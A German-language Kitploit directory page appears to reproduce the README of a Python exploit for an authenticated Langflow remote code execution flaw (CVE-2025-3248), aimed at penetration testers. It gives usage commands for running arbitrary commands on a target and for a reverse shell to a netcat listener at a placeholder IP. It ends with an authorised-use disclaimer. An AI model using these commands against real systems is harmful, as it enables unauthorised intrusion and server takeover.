Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
RCE-CVE-2025-3248 — Dieses Python-Skript nutzt CVE-2025-3248 aus, um beliebige Befehle auszuführen oder eine Reverse-Shell auf einem verwundbaren System zu starten. Für die Verwendung dieses Exploits ist eine Authentifizierung erforderlich. | Kitploit
Tools/GitHubGitHub/tiemio/rce-cve-2025-3248
ExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingRemote-Access-ToolPayload-Entwicklung
GitHubtiemio/rce-cve-2025-3248

RCE-CVE-2025-3248

Dieses Python-Skript nutzt CVE-2025-3248 aus, um beliebige Befehle auszuführen oder eine Reverse-Shell auf einem verwundbaren System zu starten. Für die Verwendung dieses Exploits ist eine Authentifizierung erforderlich.

Repository anzeigen
11vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Authentifizierte CVE-2025-3248 Langflow Remote Code Execution

Dieses Python-Skript nutzt CVE-2025-3248 aus, um beliebige Befehle auszuführen oder eine Reverse Shell auf einem verwundbaren System zu starten. Für die Nutzung dieses Exploits ist eine Authentifizierung erforderlich.


Funktionen

  • Authentifizierte Befehlsausführung: Führen Sie beliebige Systembefehle auf dem Ziel aus.
  • Reverse Shell: Starten Sie eine Reverse Shell zu Ihrem Listener.
  • Proxy-Unterstützung: Leiten Sie Anfragen über einen Proxy (z. B. Burp Suite).

Anforderungen

  • Python 3.x
  • requests-Bibliothek

Installieren Sie die Abhängigkeiten mit:

root@kitploit:~
pip install requests

Verwendung

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]

Argumente

ArgumentBeschreibungErforderlich
-u, --urlBasis-URL des Ziels (z. B. https://target.com)Ja
-l, --loginAdmin-BenutzernameJa
-p, --passwordAdmin-PasswortJa
-c, --commandBefehl, der auf dem Ziel ausgeführt werden sollNein*
--proxyProxy-URL (z. B. http://127.0.0.1:8080)Nein
--lhostLokaler Host für die Reverse ShellNein*
--lportLokaler Port für die Reverse ShellNein*

* Sie müssen entweder einen Befehl (-c) oder sowohl --lhost als auch --lport für eine Reverse Shell angeben.


Beispiele

1. Einen Befehl ausführen

root@kitploit:~
python3 exploit.py -u https://target.com -l admin -p password -c "id"

2. Eine Reverse Shell erhalten

Starten Sie einen Listener auf Ihrem Rechner:

root@kitploit:~
nc -lvnp 4444

Führen Sie dann aus:

root@kitploit:~
python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444

3. Einen Proxy verwenden

root@kitploit:~
python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080

Docker-Image

Das Image bereitstellen

Sie können das Docker-Image mit dem folgenden Befehl bereitstellen:

root@kitploit:~
podman compose up -d

Das Image ist unter http://localhost:7860 verfügbar. Credits für die Compose-Datei: Dieses Repository


Haftungsausschluss

Dieses Skript dient nur zu Bildungs- und autorisierten Penetrationstest-Zwecken. Verwenden Sie es nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Testgenehmigung haben.


Diese README wurde von KI generiert.

Tool herunterladen